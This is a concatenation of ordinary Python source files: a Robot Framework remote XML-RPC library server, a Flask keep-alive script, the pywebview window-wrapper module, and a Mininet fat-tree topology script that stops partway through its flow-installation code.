from __future__ import print_function
from collections import Mapping
import inspect
import os
import re
import select
import signal
import sys
import threading
import traceback
if sys.version_info < (3,):
from SimpleXMLRPCServer import SimpleXMLRPCServer
from StringIO import StringIO
from xmlrpclib import Binary, ServerProxy
PY2, PY3 = True, False
else:
from io import StringIO
from xmlrpc.client import Binary, ServerProxy
from xmlrpc.server import SimpleXMLRPCServer
PY2, PY3 = False, True
unicode = str
long = int
__all__ = ['RobotRemoteServer', 'stop_remote_server', 'test_remote_server']
__version__ = '1.1.1.dev1'
BINARY = re.compile('[\x00-\x08\x0B\x0C\x0E-\x1F]')
NON_ASCII = re.compile('[\x80-\xff]')
class RobotRemoteServer(object):
def __init__(self, library, host='127.0.0.1', port=8270, port_file=None,
allow_stop='DEPRECATED', serve=True, allow_remote_stop=True):
"""Configure and start-up remote server.
:param library: Test library instance or module to host.
:param host: Address to listen. Use ``'0.0.0.0'`` to listen
to all available interfaces.
:param port: Port to listen. Use ``0`` to select a free port
automatically. Can be given as an integer or as
a string.
:param port_file: File to write the port that is used. ``None`` means
no such file is written. Port file is created after
the server is started and removed automatically
after it has stopped.
:param allow_stop: DEPRECATED since version 1.1. Use
``allow_remote_stop`` instead.
:param serve: If ``True``, start the server automatically and
wait for it to be stopped.
:param allow_remote_stop: Allow/disallow stopping the server using
``Stop Remote Server`` keyword and
``stop_remote_server`` XML-RPC method.
"""
self._library = RemoteLibraryFactory(library)
self._server = StoppableXMLRPCServer(host, int(port))
self._register_functions(self._server)
self._port_file = port_file
self._allow_remote_stop = allow_remote_stop \
if allow_stop == 'DEPRECATED' else allow_stop
if serve:
self.serve()
def _register_functions(self, server):
server.register_function(self.get_keyword_names)
server.register_function(self.run_keyword)
server.register_function(self.get_keyword_arguments)
server.register_function(self.get_keyword_documentation)
server.register_function(self.stop_remote_server)
@property
def server_address(self):
"""Server address as a tuple ``(host, port)``."""
return self._server.server_address
@property
def server_port(self):
"""Server port as an integer.
If the initially given port is 0, this property also returns 0 until
the server is activated.
"""
return self._server.server_address[1]
def activate(self):
"""Bind port and activate the server but do not yet start serving.
:return: Port number that the server is going to use. This is the
actual port to use, even if the initially given port is 0.
"""
return self._server.activate()
def serve(self, log=True):
"""Start the server and wait for it to be stopped.
:param log: When ``True``, print messages about start and stop to
the console.
Automatically activates the server if it is not activated already.
If this method is executed in the main thread, automatically registers
signals SIGINT, SIGTERM and SIGHUP to stop the server.
Using this method requires using ``serve=False`` when initializing the
server. Using ``serve=True`` is equal to first using ``serve=False``
and then calling this method.
In addition to signals, the server can be stopped with the ``Stop
Remote Server`` keyword and the ``stop_remote_server`` XML-RPC method,
unless they are disabled when the server is initialized. If this method
is executed in a thread, then it is also possible to stop the server
using the :meth:`stop` method.
"""
self._server.activate()
self._announce_start(log, self._port_file)
with SignalHandler(self.stop):
self._server.serve()
self._announce_stop(log, self._port_file)
def _announce_start(self, log, port_file):
self._log('started', log)
if port_file:
with open(port_file, 'w') as pf:
pf.write(str(self.server_port))
def _announce_stop(self, log, port_file):
self._log('stopped', log)
if port_file and os.path.exists(port_file):
os.remove(port_file)
def _log(self, action, log=True, warn=False):
if log:
address = '%s:%s' % self.server_address
if warn:
print('*WARN*', end=' ')
print('Robot Framework remote server at %s %s.' % (address, action))
def stop(self):
"""Stop server."""
self._server.stop()
# Exposed XML-RPC methods. Should they be moved to their own class?
def stop_remote_server(self, log=True):
if not self._allow_remote_stop:
self._log('does not allow stopping', log, warn=True)
return False
self.stop()
return True
def get_keyword_names(self):
return self._library.get_keyword_names() + ['stop_remote_server']
def run_keyword(self, name, args, kwargs=None):
if name == 'stop_remote_server':
return KeywordRunner(self.stop_remote_server).run_keyword(args, kwargs)
return self._library.run_keyword(name, args, kwargs)
def get_keyword_arguments(self, name):
if name == 'stop_remote_server':
return []
return self._library.get_keyword_arguments(name)
def get_keyword_documentation(self, name):
if name == 'stop_remote_server':
return ('Stop the remote server unless stopping is disabled.\n\n'
'Return ``True/False`` depending on whether the server was stopped or not.')
return self._library.get_keyword_documentation(name)
def get_keyword_tags(self, name):
if name == 'stop_remote_server':
return []
return self._library.get_keyword_tags(name)
class StoppableXMLRPCServer(SimpleXMLRPCServer):
allow_reuse_address = True
def __init__(self, host, port):
SimpleXMLRPCServer.__init__(self, (host, port), logRequests=False,
bind_and_activate=False)
self._activated = False
self._stopper_thread = None
def activate(self):
if not self._activated:
self.server_bind()
self.server_activate()
self._activated = True
return self.server_address[1]
def serve(self):
self.activate()
try:
self.serve_forever()
except select.error:
# Signals seem to cause this error with Python 2.6.
if sys.version_info[:2] > (2, 6):
raise
self.server_close()
if self._stopper_thread:
self._stopper_thread.join()
self._stopper_thread = None
def stop(self):
self._stopper_thread = threading.Thread(target=self.shutdown)
self._stopper_thread.daemon = True
self._stopper_thread.start()
class SignalHandler(object):
def __init__(self, handler):
self._handler = lambda signum, frame: handler()
self._original = {}
def __enter__(self):
for name in 'SIGINT', 'SIGTERM', 'SIGHUP':
if hasattr(signal, name):
try:
orig = signal.signal(getattr(signal, name), self._handler)
except ValueError: # Not in main thread
return
self._original[name] = orig
def __exit__(self, *exc_info):
while self._original:
name, handler = self._original.popitem()
signal.signal(getattr(signal, name), handler)
def RemoteLibraryFactory(library):
if inspect.ismodule(library):
return StaticRemoteLibrary(library)
get_keyword_names = dynamic_method(library, 'get_keyword_names')
if not get_keyword_names:
return StaticRemoteLibrary(library)
run_keyword = dynamic_method(library, 'run_keyword')
if not run_keyword:
return HybridRemoteLibrary(library, get_keyword_names)
return DynamicRemoteLibrary(library, get_keyword_names, run_keyword)
def dynamic_method(library, underscore_name):
tokens = underscore_name.split('_')
camelcase_name = tokens[0] + ''.join(t.title() for t in tokens[1:])
for name in underscore_name, camelcase_name:
method = getattr(library, name, None)
if method and is_function_or_method(method):
return method
return None
def is_function_or_method(item):
return inspect.isfunction(item) or inspect.ismethod(item)
class StaticRemoteLibrary(object):
def __init__(self, library):
self._library = library
self._names, self._robot_name_index = self._get_keyword_names(library)
def _get_keyword_names(self, library):
names = []
robot_name_index = {}
for name, kw in inspect.getmembers(library):
if is_function_or_method(kw):
if getattr(kw, 'robot_name', None):
names.append(kw.robot_name)
robot_name_index[kw.robot_name] = name
elif name[0] != '_':
names.append(name)
return names, robot_name_index
def get_keyword_names(self):
return self._names
def run_keyword(self, name, args, kwargs=None):
kw = self._get_keyword(name)
return KeywordRunner(kw).run_keyword(args, kwargs)
def _get_keyword(self, name):
if name in self._robot_name_index:
name = self._robot_name_index[name]
return getattr(self._library, name)
def get_keyword_arguments(self, name):
if name == '__init__':
return []
kw = self._get_keyword(name)
args, varargs, kwargs, defaults = inspect.getargspec(kw)
if inspect.ismethod(kw):
args = args[1:] # drop 'self'
if defaults:
args, names = args[:-len(defaults)], args[-len(defaults):]
args += ['%s=%s' % (n, d) for n, d in zip(names, defaults)]
if varargs:
args.append('*%s' % varargs)
if kwargs:
args.append('**%s' % kwargs)
return args
def get_keyword_documentation(self, name):
if name == '__intro__':
source = self._library
elif name == '__init__':
source = self._get_init(self._library)
else:
source = self._get_keyword(name)
return inspect.getdoc(source) or ''
def _get_init(self, library):
if inspect.ismodule(library):
return None
init = getattr(library, '__init__', None)
return init if self._is_valid_init(init) else None
def _is_valid_init(self, init):
if not init:
return False
# https://bitbucket.org/pypy/pypy/issues/2462/
if 'PyPy' in sys.version:
if PY2:
return init.__func__ is not object.__init__.__func__
return init is not object.__init__
return is_function_or_method(init)
def get_keyword_tags(self, name):
keyword = self._get_keyword(name)
return getattr(keyword, 'robot_tags', [])
class HybridRemoteLibrary(StaticRemoteLibrary):
def __init__(self, library, get_keyword_names):
StaticRemoteLibrary.__init__(self, library)
self.get_keyword_names = get_keyword_names
class DynamicRemoteLibrary(HybridRemoteLibrary):
def __init__(self, library, get_keyword_names, run_keyword):
HybridRemoteLibrary.__init__(self, library, get_keyword_names)
self._run_keyword = run_keyword
self._supports_kwargs = self._get_kwargs_support(run_keyword)
self._get_keyword_arguments \
= dynamic_method(library, 'get_keyword_arguments')
self._get_keyword_documentation \
= dynamic_method(library, 'get_keyword_documentation')
self._get_keyword_tags \
= dynamic_method(library, 'get_keyword_tags')
def _get_kwargs_support(self, run_keyword):
spec = inspect.getargspec(run_keyword)
return len(spec.args) > 3 # self, name, args, kwargs=None
def run_keyword(self, name, args, kwargs=None):
args = [name, args, kwargs] if kwargs else [name, args]
return KeywordRunner(self._run_keyword).run_keyword(args)
def get_keyword_arguments(self, name):
if self._get_keyword_arguments:
return self._get_keyword_arguments(name)
if self._supports_kwargs:
return ['*varargs', '**kwargs']
return ['*varargs']
def get_keyword_documentation(self, name):
if self._get_keyword_documentation:
return self._get_keyword_documentation(name)
return ''
def get_keyword_tags(self, name):
if self._get_keyword_tags:
return self._get_keyword_tags(name)
return []
class KeywordRunner(object):
def __init__(self, keyword):
self._keyword = keyword
def run_keyword(self, args, kwargs=None):
args = self._handle_binary(args)
kwargs = self._handle_binary(kwargs or {})
result = KeywordResult()
with StandardStreamInterceptor() as interceptor:
try:
return_value = self._keyword(*args, **kwargs)
except Exception:
result.set_error(*sys.exc_info())
else:
try:
result.set_return(return_value)
except Exception:
result.set_error(*sys.exc_info()[:2])
else:
result.set_status('PASS')
result.set_output(interceptor.output)
return result.data
def _handle_binary(self, arg):
# No need to compare against other iterables or mappings because we
# only get actual lists and dicts over XML-RPC. Binary cannot be
# a dictionary key either.
if isinstance(arg, list):
return [self._handle_binary(item) for item in arg]
if isinstance(arg, dict):
return dict((key, self._handle_binary(arg[key])) for key in arg)
if isinstance(arg, Binary):
return arg.data
return arg
class StandardStreamInterceptor(object):
def __init__(self):
self.output = ''
self.origout = sys.stdout
self.origerr = sys.stderr
sys.stdout = StringIO()
sys.stderr = StringIO()
def __enter__(self):
return self
def __exit__(self, *exc_info):
stdout = sys.stdout.getvalue()
stderr = sys.stderr.getvalue()
close = [sys.stdout, sys.stderr]
sys.stdout = self.origout
sys.stderr = self.origerr
for stream in close:
stream.close()
if stdout and stderr:
if not stderr.startswith(('*TRACE*', '*DEBUG*', '*INFO*', '*HTML*',
'*WARN*', '*ERROR*')):
stderr = '*INFO* %s' % stderr
if not stdout.endswith('\n'):
stdout += '\n'
self.output = stdout + stderr
class KeywordResult(object):
_generic_exceptions = (AssertionError, RuntimeError, Exception)
def __init__(self):
self.data = {'status': 'FAIL'}
def set_error(self, exc_type, exc_value, exc_tb=None):
self.data['error'] = self._get_message(exc_type, exc_value)
if exc_tb:
self.data['traceback'] = self._get_traceback(exc_tb)
continuable = self._get_error_attribute(exc_value, 'CONTINUE')
if continuable:
self.data['continuable'] = continuable
fatal = self._get_error_attribute(exc_value, 'EXIT')
if fatal:
self.data['fatal'] = fatal
def _get_message(self, exc_type, exc_value):
name = exc_type.__name__
message = self._get_message_from_exception(exc_value)
if not message:
return name
if exc_type in self._generic_exceptions \
or getattr(exc_value, 'ROBOT_SUPPRESS_NAME', False):
return message
return '%s: %s' % (name, message)
def _get_message_from_exception(self, value):
# UnicodeError occurs if message contains non-ASCII bytes
try:
msg = unicode(value)
except UnicodeError:
msg = ' '.join(self._str(a, handle_binary=False) for a in value.args)
return self._handle_binary_result(msg)
def _get_traceback(self, exc_tb):
# Latest entry originates from this module so it can be removed
entries = traceback.extract_tb(exc_tb)[1:]
trace = ''.join(traceback.format_list(entries))
return 'Traceback (most recent call last):\n' + trace
def _get_error_attribute(self, exc_value, name):
return bool(getattr(exc_value, 'ROBOT_%s_ON_FAILURE' % name, False))
def set_return(self, value):
value = self._handle_return_value(value)
if value != '':
self.data['return'] = value
def _handle_return_value(self, ret):
if isinstance(ret, (str, unicode, bytes)):
return self._handle_binary_result(ret)
if isinstance(ret, (int, long, float)):
return ret
if isinstance(ret, Mapping):
return dict((self._str(key), self._handle_return_value(value))
for key, value in ret.items())
try:
return [self._handle_return_value(item) for item in ret]
except TypeError:
return self._str(ret)
def _handle_binary_result(self, result):
if not self._contains_binary(result):
return result
if not isinstance(result, bytes):
try:
result = result.encode('ASCII')
except UnicodeError:
raise ValueError("Cannot represent %r as binary." % result)
# With IronPython Binary cannot be sent if it contains "real" bytes.
if sys.platform == 'cli':
result = str(result)
return Binary(result)
def _contains_binary(self, result):
if PY3:
return isinstance(result, bytes) or BINARY.search(result)
return (isinstance(result, bytes) and NON_ASCII.search(result) or
BINARY.search(result))
def _str(self, item, handle_binary=True):
if item is None:
return ''
if not isinstance(item, (str, unicode, bytes)):
item = unicode(item)
if handle_binary:
item = self._handle_binary_result(item)
return item
def set_status(self, status):
self.data['status'] = status
def set_output(self, output):
if output:
self.data['output'] = self._handle_binary_result(output)
def test_remote_server(uri, log=True):
"""Test is remote server running.
:param uri: Server address.
:param log: Log status message or not.
:return: ``True`` if server is running, ``False`` otherwise.
"""
logger = print if log else lambda message: None
try:
ServerProxy(uri).get_keyword_names()
except Exception:
logger('No remote server running at %s.' % uri)
return False
logger('Remote server running at %s.' % uri)
return True
def stop_remote_server(uri, log=True):
"""Stop remote server unless server has disabled stopping.
:param uri: Server address.
:param log: Log status message or not.
:return: ``True`` if server was stopped or it was not running in
the first place, ``False`` otherwise.
"""
logger = print if log else lambda message: None
if not test_remote_server(uri, log=False):
logger('No remote server running at %s.' % uri)
return True
logger('Stopping remote server at %s.' % uri)
if not ServerProxy(uri).stop_remote_server():
logger('Stopping not allowed!')
return False
return True
if __name__ == '__main__':
def parse_args(script, *args):
actions = {'stop': stop_remote_server, 'test': test_remote_server}
if not (0 < len(args) < 3) or args[0] not in actions:
sys.exit('Usage: %s {test|stop} [uri]' % os.path.basename(script))
uri = args[1] if len(args) == 2 else 'http://127.0.0.1:8270'
if '://' not in uri:
uri = 'http://' + uri
return actions[args[0]], uri
action, uri = parse_args(*sys.argv)
success = action(uri)
sys.exit(0 if success else 1)
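# --- Usage sketch (illustrative; not part of the original robotremoteserver.py) ---
# Hosting a plain Python class as a remote library. ExampleLibrary and its
# keyword are made-up names; the serve=False / activate() / serve() pattern
# follows the docstrings above.
#
# class ExampleLibrary(object):
#     def count_items_in_directory(self, path):
#         """Return the number of items in the given directory."""
#         return len(os.listdir(path))
#
# server = RobotRemoteServer(ExampleLibrary(), port=0, serve=False)
# print(server.activate())   # binds a free port and reports it
# server.serve()             # blocks until the server is stopped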
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Your bot is alive!"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
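# --- Usage sketch (illustrative; not part of the original keep_alive.py) ---
# Typical use from a bot's entry point: start the Flask server in a
# background thread so an external uptime monitor can poll port 8080,
# then run the bot's own blocking loop. The bot call is hypothetical.
#
# from keep_alive import keep_alive
# keep_alive()
# run_my_bot()  # hypothetical blocking call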
|
__init__.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
pywebview is a lightweight cross-platform wrapper around a webview component that allows displaying HTML content in its
own dedicated window. It works on Windows, OS X and Linux and is compatible with Python 2 and 3.
(C) 2014-2018 Roman Sirokov and contributors
Licensed under BSD license
http://github.com/r0x0r/pywebview/
"""
import json
import logging
import os
import platform
import re
import sys
from threading import Event, Thread, current_thread
from uuid import uuid4
from functools import wraps
from webview.util import base_uri, parse_file_type, escape_string, transform_url, make_unicode, escape_line_breaks, inject_base_uri
from .js import css
from .localization import localization
logger = logging.getLogger('pywebview')
handler = logging.StreamHandler()
formatter = logging.Formatter('[pywebview] %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
OPEN_DIALOG = 10
FOLDER_DIALOG = 20
SAVE_DIALOG = 30
class Config (dict):
def __init__(self):
self.use_qt = 'USE_QT' in os.environ
self.use_win32 = 'USE_WIN32' in os.environ
self.gui = 'qt' if 'KDE_FULL_SESSION' in os.environ else None
self.gui = os.environ['PYWEBVIEW_GUI'].lower() \
if 'PYWEBVIEW_GUI' in os.environ and os.environ['PYWEBVIEW_GUI'].lower() in ['qt', 'gtk', 'win32'] \
else None
def __getitem__(self, key):
return getattr(self, key.lower())
def __setitem__(self, key, value):
setattr(self, key.lower(), value)
config = Config()
_initialized = False
_webview_ready = Event()
def _initialize_imports():
def import_gtk():
global gui
try:
import webview.gtk as gui
logger.debug('Using GTK')
return True
except (ImportError, ValueError) as e:
logger.exception('GTK cannot be loaded')
return False
def import_qt():
global gui
try:
import webview.qt as gui
logger.debug('Using QT')
return True
except ImportError as e:
logger.exception('QT cannot be loaded')
return False
def import_cocoa():
global gui
try:
import webview.cocoa as gui
return True
except ImportError:
logger.exception('PyObjC cannot be loaded')
return False
def import_win32():
global gui
try:
import webview.win32 as gui
logger.debug('Using Win32')
return True
except ImportError as e:
logger.exception('PyWin32 cannot be loaded')
return False
def import_winforms():
global gui
try:
import webview.winforms as gui
logger.debug('Using .NET')
return True
except ImportError as e:
logger.exception('pythonnet cannot be loaded')
return False
def try_import(guis):
while guis:
import_func = guis.pop(0)
if import_func():
return True
return False
global _initialized
if not _initialized:
if platform.system() == 'Darwin':
if config.gui == 'qt' or config.use_qt:
guis = [import_qt, import_cocoa]
else:
guis = [import_cocoa, import_qt]
if not try_import(guis):
raise Exception('You must have either PyObjC (for Cocoa support) or Qt with Python bindings installed in order to use pywebview.')
elif platform.system() == 'Linux' or platform.system() == 'OpenBSD':
if config.gui == 'gtk' or config.gui != 'qt' and not config.use_qt:
guis = [import_gtk, import_qt]
else:
guis = [import_qt, import_gtk]
if not try_import(guis):
raise Exception('You must have either QT or GTK with Python extensions installed in order to use pywebview.')
elif platform.system() == 'Windows':
if config.gui == 'win32' or config.use_win32:
guis = [import_win32, import_winforms]
else:
guis = [import_winforms, import_win32]
if not try_import(guis):
raise Exception('You must have either pythonnet or pywin32 installed in order to use pywebview.')
else:
raise Exception('Unsupported platform. Only Windows, Linux, OS X, OpenBSD are supported.')
_initialized = True
def _api_call(function):
"""
Decorator to call a pywebview API, checking for _webview_ready and raising
appropriate Exceptions on failure.
"""
@wraps(function)
def wrapper(*args, **kwargs):
try:
_webview_ready.wait(5)
return function(*args, **kwargs)
except NameError:
raise Exception('Create a web view window first, before invoking this function')
except KeyError:
try:
uid = kwargs['uid']
except KeyError:
# uid not passed as a keyword arg; assume it is the last positional argument
uid = args[-1]
raise Exception('Cannot call function: No webview exists with uid: {}'.format(uid))
return wrapper
def create_window(title, url=None, js_api=None, width=800, height=600,
resizable=True, fullscreen=False, min_size=(200, 100), strings={}, confirm_quit=False,
background_color='#FFFFFF', text_select=False, debug=False):
"""
Create a web view window using a native GUI. The execution blocks after this function is invoked, so other
program logic must be executed in a separate thread.
:param title: Window title
:param url: URL to load
:param width: window width. Default is 800px
:param height: window height. Default is 600px
:param resizable: True if window can be resized, False otherwise. Default is True
:param fullscreen: True if start in fullscreen mode. Default is False
:param min_size: a (width, height) tuple that specifies a minimum window size. Default is 200x100
:param strings: a dictionary with localized strings
:param confirm_quit: Display a quit confirmation dialog. Default is False
:param background_color: Background color as a hex string that is displayed before the content of webview is loaded. Default is white.
:param text_select: Allow text selection on page. Default is False.
:return: The uid of the created window.
"""
valid_color = r'^#(?:[0-9a-fA-F]{3}){1,2}$'
if not re.match(valid_color, background_color):
raise ValueError('{0} is not a valid hex triplet color'.format(background_color))
# Check if starting up from main thread; if not, wait; finally raise exception
if current_thread().name == 'MainThread':
uid = 'master'
if not _initialized:
_initialize_imports()
localization.update(strings)
else:
uid = 'child_' + uuid4().hex[:8]
if not _webview_ready.wait(5):
raise Exception('Call create_window from the main thread first, and then from subthreads')
_webview_ready.clear() # Make API calls wait while the new window is created
gui.create_window(uid, make_unicode(title), transform_url(url),
width, height, resizable, fullscreen, min_size, confirm_quit,
background_color, debug, js_api, text_select, _webview_ready)
if uid == 'master':
_webview_ready.clear()
else:
return uid
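# --- Usage sketch (illustrative; not part of this module) ---
# From an application script: create_window() blocks the main thread, so
# background logic runs in its own thread and waits for webview_ready()
# before touching the window. The example URL is an assumption.
#
# import threading
# import webview
#
# def background():
#     webview.webview_ready()                 # wait for the window
#     webview.load_url('https://example.com') # then drive it
#
# threading.Thread(target=background).start()
# webview.create_window('Example window', 'https://example.com')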
@_api_call
def create_file_dialog(dialog_type=OPEN_DIALOG, directory='', allow_multiple=False, save_filename='', file_types=()):
"""
Create a file dialog
:param dialog_type: Dialog type: open file (OPEN_DIALOG), save file (SAVE_DIALOG), open folder (FOLDER_DIALOG). Default
is open file.
:param directory: Initial directory
:param allow_multiple: Allow multiple selection. Default is false.
:param save_filename: Default filename for save file dialog.
:param file_types: Allowed file types in open file dialog. Should be a tuple of strings in the format:
filetypes = ('Description (*.extension[;*.extension[;...]])', ...)
:return: A tuple of selected files, None if cancelled.
"""
if type(file_types) != tuple and type(file_types) != list:
raise TypeError('file_types must be a tuple of strings')
for f in file_types:
parse_file_type(f)
if not os.path.exists(directory):
directory = ''
return gui.create_file_dialog(dialog_type, directory, allow_multiple, save_filename, file_types)
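# --- Usage sketch (illustrative; not part of this module) ---
# Example of the file_types format described in the docstring above; the
# descriptions and extensions are arbitrary.
#
# result = create_file_dialog(OPEN_DIALOG, allow_multiple=True,
#                             file_types=('Image Files (*.png;*.jpg)', 'All files (*.*)'))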
@_api_call
def load_url(url, uid='master'):
"""
Load a new URL into a previously created WebView window. This function must be invoked after a WebView window has been
created with create_window(); otherwise an exception is thrown.
:param url: url to load
:param uid: uid of the target instance
"""
gui.load_url(url, uid)
@_api_call
def load_html(content, base_uri=base_uri(), uid='master'):
"""
Load new content into a previously created WebView window. This function must be invoked after a WebView window has been
created with create_window(); otherwise an exception is thrown.
:param content: Content to load.
:param base_uri: Base URI for resolving links. Default is the directory of the application entry point.
:param uid: uid of the target instance
"""
content = make_unicode(content)
gui.load_html(content, base_uri, uid)
@_api_call
def load_css(stylesheet, uid='master'):
code = css.src % stylesheet.replace('\n', '').replace('\r', '').replace('"', "'")
gui.evaluate_js(code, uid)
@_api_call
def set_title(title, uid='master'):
"""
Set a new title for the window
"""
gui.set_title(title, uid)
@_api_call
def get_current_url(uid='master'):
"""
Get the URL currently loaded in the target webview
:param uid: uid of the target instance
"""
return gui.get_current_url(uid)
@_api_call
def destroy_window(uid='master'):
"""
Destroy a web view window
:param uid: uid of the target instance
"""
gui.destroy_window(uid)
@_api_call
def toggle_fullscreen(uid='master'):
"""
Toggle fullscreen mode
:param uid: uid of the target instance
"""
gui.toggle_fullscreen(uid)
@_api_call
def set_window_size(width, height, uid='master'):
"""
Set the window size
:param width: desired width of target window
:param height: desired height of target window
:param uid: uid of the target instance
"""
gui.set_window_size(width, height, uid)
@_api_call
def evaluate_js(script, uid='master'):
"""
Evaluate given JavaScript code and return the result
:param script: The JavaScript code to be evaluated
:param uid: uid of the target instance
:return: Return value of the evaluated code
"""
escaped_script = 'JSON.stringify(eval("{0}"))'.format(escape_string(script))
return gui.evaluate_js(escaped_script, uid)
def window_exists(uid='master'):
"""
Check whether a webview with the given UID is up and running
:param uid: uid of the target instance
:return: True if the window exists, False otherwise
"""
try:
get_current_url(uid)
return True
except:
return False
def webview_ready(timeout=None):
"""
:param timeout: optional timeout in seconds
:return: True when the last opened window is ready; False if the given timeout is reached before that.
Blocks the calling thread until then.
"""
return _webview_ready.wait(timeout)
def _js_bridge_call(uid, api_instance, func_name, param):
def _call():
result = json.dumps(function(func_params))
code = 'window.pywebview._returnValues["{0}"] = {{ isSet: true, value: {1}}}'.format(func_name, escape_line_breaks(result))
evaluate_js(code, uid)
function = getattr(api_instance, func_name, None)
if function is not None:
try:
func_params = param if not param else json.loads(param)
t = Thread(target=_call)
t.start()
except Exception as e:
logger.exception('Error occurred while evaluating function {0}'.format(func_name))
else:
logger.error('Function {}() does not exist'.format(func_name))
|
fattree4.py
|
# Copyright (C) 2016 Huang MaChi at Chongqing University
# of Posts and Telecommunications, China.
# Copyright (C) 2016 Li Cheng at Beijing University of Posts
# and Telecommunications. www.muzixing.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import signal
import sys
from ryu.app.experiments.readfile import readIpeers
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.link import Link, Intf, TCLink
from mininet.topo import Topo
import random
from subprocess import Popen
from multiprocessing import Process
import time
from threading import Thread
import logging
import os
parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, parentdir)
parser = argparse.ArgumentParser(description="Parameters importation")
parser.add_argument('--k', dest='k', type=int, default=4, choices=[4, 8], help="Switch fanout number")
parser.add_argument('--duration', dest='duration', type=int, default=60, help="Duration (sec) for each iperf traffic generation")
parser.add_argument('--dir', dest='output_dir', help="Directory to store outputs")
parser.add_argument('--cpu', dest='cpu', type=float, default=1.0, help='Total CPU to allocate to hosts')
args = parser.parse_args()
def _set_ovs_protocol_13(sw_list):
for sw in sw_list:
cmd = "sudo ovs-vsctl set bridge %s protocols=OpenFlow13" % sw
os.system(cmd)
class Fattree(Topo):
"""
Class of Fattree Topology.
"""
CoreSwitchList = []
AggSwitchList = []
EdgeSwitchList = []
HostList = []
def __init__(self, k, density):
self.pod = k
self.density = density
self.iCoreLayerSwitch = (k/2)**2
self.iAggLayerSwitch = k*k/2
self.iEdgeLayerSwitch = k*k/2
self.iHost = self.iEdgeLayerSwitch * density
# Init Topo
Topo.__init__(self)
def createNodes(self):
self.createCoreLayerSwitch(self.iCoreLayerSwitch)
self.createAggLayerSwitch(self.iAggLayerSwitch)
self.createEdgeLayerSwitch(self.iEdgeLayerSwitch)
self.createHost(self.iHost)
# Create Switch and Host
def _addSwitch(self, number, level, switch_list):
"""
Create switches.
"""
for i in xrange(1, number+1):
PREFIX = str(level) + "00"
if i >= 10:
PREFIX = str(level) + "0"
switch_list.append(self.addSwitch(PREFIX + str(i)))
def createCoreLayerSwitch(self, NUMBER):
self._addSwitch(NUMBER, 1, self.CoreSwitchList)
def createAggLayerSwitch(self, NUMBER):
self._addSwitch(NUMBER, 2, self.AggSwitchList)
def createEdgeLayerSwitch(self, NUMBER):
self._addSwitch(NUMBER, 3, self.EdgeSwitchList)
def createHost(self, NUMBER):
"""
Create hosts.
"""
for i in xrange(1, NUMBER+1):
if i >= 100:
PREFIX = "h"
elif i >= 10:
PREFIX = "h0"
else:
PREFIX = "h00"
self.HostList.append(self.addHost(PREFIX + str(i), cpu=1.0/NUMBER))
def createLinks(self, bw_c2a, bw_a2e, bw_e2h):
"""
Add network links.
"""
# Core to Agg
end = self.pod/2
for x in xrange(0, self.iAggLayerSwitch, end):
for i in xrange(0, end):
for j in xrange(0, end):
self.addLink(
self.CoreSwitchList[i*end+j],
self.AggSwitchList[x+i],
bw=bw_c2a, max_queue_size=1000) # use_htb=False
# Agg to Edge
for x in xrange(0, self.iAggLayerSwitch, end):
for i in xrange(0, end):
for j in xrange(0, end):
self.addLink(
self.AggSwitchList[x+i], self.EdgeSwitchList[x+j],
bw=bw_a2e, max_queue_size=1000) # use_htb=False
# Edge to Host
for x in xrange(0, self.iEdgeLayerSwitch):
for i in xrange(0, self.density):
self.addLink(
self.EdgeSwitchList[x],
self.HostList[self.density * x + i],
bw=bw_e2h, max_queue_size=1000) # use_htb=False
def set_ovs_protocol_13(self,):
"""
Set the OpenFlow version for switches.
"""
_set_ovs_protocol_13(self.CoreSwitchList)
_set_ovs_protocol_13(self.AggSwitchList)
_set_ovs_protocol_13(self.EdgeSwitchList)
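# --- Usage sketch (illustrative; not part of the original script) ---
# Building the k=4 fat-tree (2 hosts per edge switch, 16 hosts in total)
# and starting Mininet against a remote controller. The controller address
# and port are assumptions; set_host_ip() and install_proactive() are
# defined further below in this file.
#
# topo = Fattree(4, 2)
# topo.createNodes()
# topo.createLinks(bw_c2a=10, bw_a2e=10, bw_e2h=10)
# net = Mininet(topo=topo, link=TCLink, controller=None, autoSetMacs=True)
# net.addController('c0', controller=RemoteController, ip='127.0.0.1', port=6653)
# net.start()
# topo.set_ovs_protocol_13()
# set_host_ip(net, topo)
# install_proactive(net, topo)
# CLI(net)
# net.stop()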
def set_host_ip(net, topo):
hostlist = []
for k in xrange(len(topo.HostList)):
hostlist.append(net.get(topo.HostList[k]))
i = 1
j = 1
for host in hostlist:
host.setIP("10.%d.0.%d" % (i, j))
j += 1
if j == topo.density+1:
j = 1
i += 1
def create_subnetList(topo, num):
"""
Create the subnet list for a given pod.
"""
subnetList = []
remainder = num % (topo.pod/2)
if topo.pod == 4:
if remainder == 0:
subnetList = [num-1, num]
elif remainder == 1:
subnetList = [num, num+1]
else:
pass
elif topo.pod == 8:
if remainder == 0:
subnetList = [num-3, num-2, num-1, num]
elif remainder == 1:
subnetList = [num, num+1, num+2, num+3]
elif remainder == 2:
subnetList = [num-1, num, num+1, num+2]
elif remainder == 3:
subnetList = [num-2, num-1, num, num+1]
else:
pass
else:
pass
return subnetList
def install_proactive(net, topo):
"""
Install proactive flow entries for switches.
"""
# Edge Switch
for sw in topo.EdgeSwitchList:
num = int(sw[-2:])
# Downstream.
for i in xrange(1, topo.density+1):
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,arp, \
nw_dst=10.%d.0.%d,actions=output:%d'" % (sw, num, i, topo.pod/2+i)
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,ip, \
